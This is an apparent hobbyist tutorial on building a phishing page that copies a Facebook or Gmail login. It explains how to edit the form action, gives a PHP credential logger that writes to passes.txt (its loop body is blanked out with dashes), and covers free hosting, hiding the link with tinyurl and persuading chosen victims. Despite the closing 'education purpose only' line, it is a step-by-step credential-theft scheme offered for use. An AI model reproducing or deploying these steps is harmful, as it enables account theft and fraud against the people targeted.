What is a Phishing page?
The
first thing we ask ourselves is, "What the hell is a phishing page?"
Well, a phishing page is an exact copy of a webpage. It is used to trick
someone into giving you their login details. Come to think of it, it's
pretty easy to make.
Making the phishing page
The
first thing you will need for the page is, a page. Just go to the site
you want to copy, right-click the mouse and press "Save Page As..." Make
a new folder in your computer and save the page in it with the
name,"index.htm"
NOTE: The page must have a place where the target can enter login details, eg. the homepage of Facebook.
Now
you will have to edit the index.htm file. Open it in a text editor,
supposedly, notepad. Press, CTRL+F. Look for the keyword, "action."
For example, if you want to make a phishing page for Facebook, you'll get something like this:
action="https://www.facebook.com/login.php?login_attempt=1" method="post"
and if you're making one for Gmail, you'll get this:
action="https://accounts.google.com/ServiceLoginAuth" method="post"
What you have to do is simple. Change the part of the line that contains the URL to "login.php" For example, "
https://www.facebook.com/login.php?login_attempt=1" will become "login.php" Next, Change the segment, "method=post" to "method=get"
The Segment should not look like this:
action="login.php" method="get"
Now, for the "login.php" file.
Just copy and paste this code into a notepad file and save it as "login.php" without the "s
<?php
header("Location: http://www.site.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
-
-
-
-
}
-
-
-
?>
NOTE: Change the link in the second line of the PHP script to the original URL of the site you want to copy.
header("Location: http://www.site.com");
Then, create a notepad file and name it to "passes"
I hope you have saved all of these files in a single folder.
Your phishing page is ready for upload.
Putting it online
You
now have all the data required for the phishing page. Now you must host
it on the internet. You can use any web hosting site like
5gbfree.com. Upload all of these files to your site. When you will open
the link, you will get a ditto copy of the site you wanted to use!
The
most important part of making a Phishing page is choosing your victims
closely and persuading them into using the page. Remember to use
tinyurl.com to shorten and hide the link before sending it your victim
too. You must be a good Social Engineer in order for this to work.
NOTE: THIS IS FOR EDUCATION PURPOSE ONLY !!!